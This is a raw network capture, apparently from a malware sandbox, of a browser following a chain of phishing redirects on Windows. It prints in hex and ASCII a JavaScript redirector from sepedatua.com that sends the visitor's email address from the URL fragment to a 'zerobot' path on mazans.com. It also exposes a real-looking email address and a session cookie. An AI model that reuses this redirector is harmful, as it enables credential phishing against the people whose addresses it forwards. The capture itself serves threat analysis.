                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:03 UTC393INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 706
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:02 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                          Location: https://sepedatua.com/158983/secure-redirect/
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: quic=":443"; ma=2592000; v="43,46", h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-25=":443"; ma=2592000, h3-27=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:03 UTC706INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 3e 0a 3c 74 69 74 6c 65 3e 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" ><title> 301 Moved Permanently</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helve


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          7192.168.2.174971540.126.31.73443
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:04 UTC422OUTPOST /RST2.srf HTTP/1.0
                                                                                                                                                                                                                                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/soap+xml
                                                                                                                                                                                                                                                                                                                                                                          Accept: */*
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 10.0; Win64; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729; IDCRL 24.10.0.19045.0.0; IDCRL-cfg 16.000.29743.00; App svchost.exe, 10.0.19041.1806, {DF60E2DF-88AD-4526-AE21-83D130EF0F68})
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 4742
                                                                                                                                                                                                                                                                                                                                                                          Host: login.live.com
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:04 UTC4742OUTData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 55 54 46 2d 38 22 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 70 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 50 61 73 73 70 6f 72 74 2f 53 6f 61 70 53 65 72 76 69 63 65 73 2f 50 50 43 52 4c 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="UTF-8"?><s:Envelope xmlns:s="http://www.w3.org/2003/05/soap-envelope" xmlns:ps="http://schemas.microsoft.com/Passport/SoapServices/PPCRL" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:04 UTC569INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: application/soap+xml; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                          Expires: Wed, 13 Nov 2024 16:28:04 GMT
                                                                                                                                                                                                                                                                                                                                                                          P3P: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                                                                                                                                                                                          Referrer-Policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                                                                                                                          x-ms-route-info: C529_BAY
                                                                                                                                                                                                                                                                                                                                                                          x-ms-request-id: 331af0c0-aae2-4f29-94a0-02558362a736
                                                                                                                                                                                                                                                                                                                                                                          PPServer: PPV: 30 H: PH1PEPF00011E5C V: 0
                                                                                                                                                                                                                                                                                                                                                                          X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                          Strict-Transport-Security: max-age=31536000
                                                                                                                                                                                                                                                                                                                                                                          X-XSS-Protection: 1; mode=block
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:03 GMT
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 10197
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:04 UTC10197INData Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 20 3f 3e 3c 53 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 53 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 33 2f 30 35 2f 73 6f 61 70 2d 65 6e 76 65 6c 6f 70 65 22 20 78 6d 6c 6e 73 3a 77 73 73 65 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30 34 30 31 2d 77 73 73 2d 77 73 73 65 63 75 72 69 74 79 2d 73 65 63 65 78 74 2d 31 2e 30 2e 78 73 64 22 20 78 6d 6c 6e 73 3a 77 73 75 3d 22 68 74 74 70 3a 2f 2f 64 6f 63 73 2e 6f 61 73 69 73 2d 6f 70 65 6e 2e 6f 72 67 2f 77 73 73 2f 32 30 30 34 2f 30 31 2f 6f 61 73 69 73 2d 32 30 30
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <?xml version="1.0" encoding="utf-8" ?><S:Envelope xmlns:S="http://www.w3.org/2003/05/soap-envelope" xmlns:wsse="http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-wssecurity-secext-1.0.xsd" xmlns:wsu="http://docs.oasis-open.org/wss/2004/01/oasis-200


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          8192.168.2.1749716103.134.152.124436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:04 UTC679OUTGET /158983/secure-redirect/ HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: sepedatua.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-User: ?1
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:04 UTC389INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html
                                                                                                                                                                                                                                                                                                                                                                          Last-Modified: Tue, 12 Nov 2024 17:05:13 GMT
                                                                                                                                                                                                                                                                                                                                                                          Accept-Ranges: bytes
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 254
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:04 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: LiteSpeed
                                                                                                                                                                                                                                                                                                                                                                          Alt-Svc: quic=":443"; ma=2592000; v="43,46", h3-Q043=":443"; ma=2592000, h3-Q046=":443"; ma=2592000, h3-Q050=":443"; ma=2592000, h3-25=":443"; ma=2592000, h3-27=":443"; ma=2592000
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:04 UTC254INData Raw: 3c 73 63 72 69 70 74 3e 0a 20 20 20 20 28 66 75 6e 63 74 69 6f 6e 28 29 20 7b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6d 79 6c 69 6e 6b 20 3d 20 27 68 74 74 70 73 3a 2f 2f 6d 61 7a 61 6e 73 2e 63 6f 6d 2f 57 45 42 2d 49 44 2d 36 36 37 32 38 34 39 36 38 37 39 32 34 2f 7a 65 72 6f 62 6f 74 3f 65 6d 61 69 6c 3d 27 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 66 72 61 67 6d 65 6e 74 20 3d 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 61 73 68 2e 73 75 62 73 74 72 69 6e 67 28 31 29 2e 72 65 70 6c 61 63 65 28 2f 5c 2b 2f 67 2c 20 27 40 27 29 3b 0a 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 20 3d 20 6d 79 6c 69 6e 6b 20 2b 20 66 72 61 67 6d 65 6e 74 3b 0a 20 20 20 20 7d 29 28 29 3b 0a 3c 2f 73 63 72 69 70 74 3e 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <script> (function() { var mylink = 'https://mazans.com/WEB-ID-6672849687924/zerobot?email='; var fragment = window.location.hash.substring(1).replace(/\+/g, '@'); window.location.href = mylink + fragment; })();</script>


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          9192.168.2.1749721162.241.85.1724436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:05 UTC729OUTGET /WEB-ID-6672849687924/zerobot?email=Pmendon.ext@goeasy.com HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://sepedatua.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:05 UTC261INHTTP/1.1 301 Moved Permanently
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:05 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                                                                                                                          Location: https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.com
                                                                                                                                                                                                                                                                                                                                                                          Content-Length: 285
                                                                                                                                                                                                                                                                                                                                                                          Connection: close
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:05 UTC285INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 6d 61 7a 61 6e 73 2e 63 6f 6d 2f 57 45 42 2d 49 44 2d 36 36 37 32 38 34 39 36 38 37 39 32 34 2f 7a 65 72 6f 62 6f 74 2f 3f 65 6d 61 69 6c 3d 50 6d 65 6e 64 6f 6e 2e 65 78 74 40 67 6f 65 61 73 79 2e 63 6f 6d 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://mazans.com/WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.com"


                                                                                                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                          10192.168.2.1749720162.241.85.1724436552C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:05 UTC730OUTGET /WEB-ID-6672849687924/zerobot/?email=Pmendon.ext@goeasy.com HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                          Host: mazans.com
                                                                                                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                          Upgrade-Insecure-Requests: 1
                                                                                                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                                                                                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Mode: navigate
                                                                                                                                                                                                                                                                                                                                                                          Sec-Fetch-Dest: document
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                                                                                                                          Referer: https://sepedatua.com/
                                                                                                                                                                                                                                                                                                                                                                          Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:08 UTC382INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                          Date: Wed, 13 Nov 2024 16:29:05 GMT
                                                                                                                                                                                                                                                                                                                                                                          Server: Apache
                                                                                                                                                                                                                                                                                                                                                                          Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                                                                                                                                                                                                                                                                                          Cache-Control: no-store, no-cache, must-revalidate
                                                                                                                                                                                                                                                                                                                                                                          Pragma: no-cache
                                                                                                                                                                                                                                                                                                                                                                          Set-Cookie: PHPSESSID=760389281e5877a1c07bb48e8e0ac3a9; path=/
                                                                                                                                                                                                                                                                                                                                                                          Upgrade: h2,h2c
                                                                                                                                                                                                                                                                                                                                                                          Connection: Upgrade, close
                                                                                                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:08 UTC7810INData Raw: 34 30 30 30 0d 0a 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 20 7c 20 53 65 6e 64 47 72 69 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 0a 0a 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 54 61 67 20 4d 61 6e 61 67 65 72 20 2a 2f 2d 2d 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 6d 6f 64 75 6c 65 22 3e 0a 20 20 77 69 6e 64 6f 77 2e 52 55 4d 5f 42 41 53 45 20 3d 20 27 68 74 74 70 73 3a 2f 2f 72 75 6d 2e 68 6c 78 2e 70 61 67 65 2f 27 3b 0a 20 20 69 6d 70 6f 72 74 20
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 4000<!DOCTYPE HTML><html lang="en-US"><head> <meta charset="UTF-8"/> <title>Page not found | SendGrid</title> ... Google Tag Manager */--> <script type="module"> window.RUM_BASE = 'https://rum.hlx.page/'; import
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:08 UTC8580INData Raw: 66 6f 75 6e 64 20 7c 20 53 65 6e 64 47 72 69 64 20 22 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 64 65 73 63 72 69 70 74 69 6f 6e 22 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 69 6d 61 67 65 22 20 63 6f 6e 74 65 6e 74 3d 22 68 74 74 70 73 3a 2f 2f 73 65 6e 64 67 72 69 64 2e 63 6f 6d 2f 63 6f 6e 74 65 6e 74 2f 64 61 6d 2f 73 65 6e 64 67 72 69 64 2f 63 6f 72 65 2d 61 73 73 65 74 73 2f 73 6f 63 69 61 6c 2f 73 65 6e 64 67 72 69 64 2d 64 65 66 61 75 6c 74 2d 6f 67 69 6d 61 67 65 2e 70 6e 67 22 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 74 77 69 74 74 65 72 3a 63 61 72 64 22 20 63 6f 6e 74 65 6e 74 3d 22 73 75 6d 6d 61 72 79 5f 6c 61 72 67 65 5f 69 6d 61 67 65 22 2f 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: found | SendGrid "/><meta name="twitter:description"/><meta name="twitter:image" content="https://sendgrid.com/content/dam/sendgrid/core-assets/social/sendgrid-default-ogimage.png"/><meta name="twitter:card" content="summary_large_image"/><meta name="
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:08 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:08 UTC8192INData Raw: 34 30 30 30 0d 0a 2e 32 30 36 38 48 37 30 2e 33 35 36 31 43 37 30 2e 32 34 35 33 20 30 2e 30 30 31 39 35 33 31 32 20 37 30 2e 31 35 36 33 20 30 2e 30 39 35 31 32 39 33 20 37 30 2e 31 35 32 33 20 30 2e 32 31 30 31 31 33 56 30 2e 32 30 38 31 33 5a 22 20 66 69 6c 6c 3d 22 23 31 32 31 43 32 44 22 2f 3e 0a 3c 70 61 74 68 20 64 3d 22 4d 37 35 2e 33 34 31 38 20 30 2e 32 31 34 30 37 38 56 32 2e 36 31 38 38 31 43 37 35 2e 33 34 31 38 20 32 2e 36 37 34 33 32 20 37 35 2e 33 36 33 36 20 32 2e 37 32 37 38 35 20 37 35 2e 34 30 31 31 20 32 2e 37 36 39 34 38 43 37 35 2e 34 33 38 37 20 32 2e 38 30 39 31 33 20 37 35 2e 34 39 30 31 20 32 2e 38 33 32 39 32 20 37 35 2e 35 34 35 35 20 32 2e 38 33 32 39 32 48 37 39 2e 34 33 35 38 43 37 39 2e 35 34 38 36 20 32 2e 38 33 32 39 32
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 4000.2068H70.3561C70.2453 0.00195312 70.1563 0.0951293 70.1523 0.210113V0.20813Z" fill="#121C2D"/><path d="M75.3418 0.214078V2.61881C75.3418 2.67432 75.3636 2.72785 75.4011 2.76948C75.4387 2.80913 75.4901 2.83292 75.5455 2.83292H79.4358C79.5486 2.83292
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:08 UTC8198INData Raw: 0a 20 20 20 20 3c 74 69 74 6c 65 3e 41 6e 20 69 63 6f 6e 20 6f 66 20 61 20 72 69 67 68 74 20 61 72 72 6f 77 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 70 61 74 68 20 63 6c 61 73 73 3d 22 69 63 6f 6e 2d 73 74 72 6f 6b 65 22 20 64 3d 22 4d 37 35 2e 30 34 33 35 20 32 33 2e 30 35 38 38 48 33 2e 30 34 33 34 36 4d 37 35 2e 30 34 33 35 20 32 33 2e 30 35 38 38 4c 35 35 2e 36 34 35 31 20 32 2e 39 32 33 38 33 4d 37 35 2e 30 34 33 35 20 32 33 2e 30 35 38 38 4c 35 35 2e 36 34 35 31 20 34 32 2e 38 34 37 38 22 20 73 74 72 6f 6b 65 3d 22 23 46 32 32 46 34 36 22 20 73 74 72 6f 6b 65 2d 77 69 64 74 68 3d 22 35 2e 35 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 63 61 70 3d 22 72 6f 75 6e 64 22 20 73 74 72 6f 6b 65 2d 6c 69 6e 65 6a 6f 69 6e 3d 22 72 6f 75 6e 64 22 2f 3e 0a 3c 2f
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: <title>An icon of a right arrow</title> <path class="icon-stroke" d="M75.0435 23.0588H3.04346M75.0435 23.0588L55.6451 2.92383M75.0435 23.0588L55.6451 42.8478" stroke="#F22F46" stroke-width="5.5" stroke-linecap="round" stroke-linejoin="round"/></
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:08 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii:
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:08 UTC8192INData Raw: 34 30 30 30 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 54 61 6b 65 20 61 20 74 6f 75 72 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 0a 0a 20 20 20 20 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 3c 73 70 61 6e 20 63 6c 61 73 73 3d 22 62 75 74 74 6f 6e 2d 69 63 6f 6e 20 72 69 67 68 74 2d 61 72 72 6f 77 20 6d 65 64 69 75 6d 22 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 73 76 67 20 20 76 69 65 77 42 6f 78 3d 22 30 20 30 20 37 38 20 34 36 22 20 66 69 6c 6c 3d 22 6e 6f 6e 65 22 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 30 2f 73 76 67 22 20 63 6c 61 73 73 3d 22
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: 4000 Take a tour <span class="button-icon right-arrow medium"> <svg viewBox="0 0 78 46" fill="none" xmlns="http://www.w3.org/2000/svg" class="
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:08 UTC8198INData Raw: 3e 0a 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 0a 0a 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 0a 0a 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 20 20 20 20 0a 20 20 20 20 0a 0a 20 20 20 20 0a 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 0a 0a 0a 20 20 20 20 3c 2f 73 65 63 74 69 6f 6e 3e 0a 0a 09 3c 2f 64 69 76 3e 0a 0a 3c 2f 6c 69 3e 0a 3c 6c 69 3e 0a 09 0a 09 3c 62 75 74 74 6f 6e 20 61 72 69 61 2d 65 78 70 61 6e 64 65 64 3d 22 66 61 6c 73 65 22 20 61 72 69 61 2d 63 6f 6e 74 72 6f 6c 73 3d 22 6e 61 76 69 67 61 74 69 6f 6e 2d 64 72 6f 70 64 6f 77 6e 2d 31 22 20 64 61 74 61 2d 6e 61 76 2d 69 64 3d 22 31 22 20 63 6c 61 73 73 3d 22 6e 61 76 69 67 61 74 69 6f 6e 2d 6c 69 6e 6b 20 6d 65 67 61 2d 6d 65 6e 75 22 20 69 64 3d 22 6e
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii: > </div> </div> </div> </section></div></li><li><button aria-expanded="false" aria-controls="navigation-dropdown-1" data-nav-id="1" class="navigation-link mega-menu" id="n
                                                                                                                                                                                                                                                                                                                                                                          2024-11-13 16:29:08 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                                                                                                                                                                                          Data Ascii:
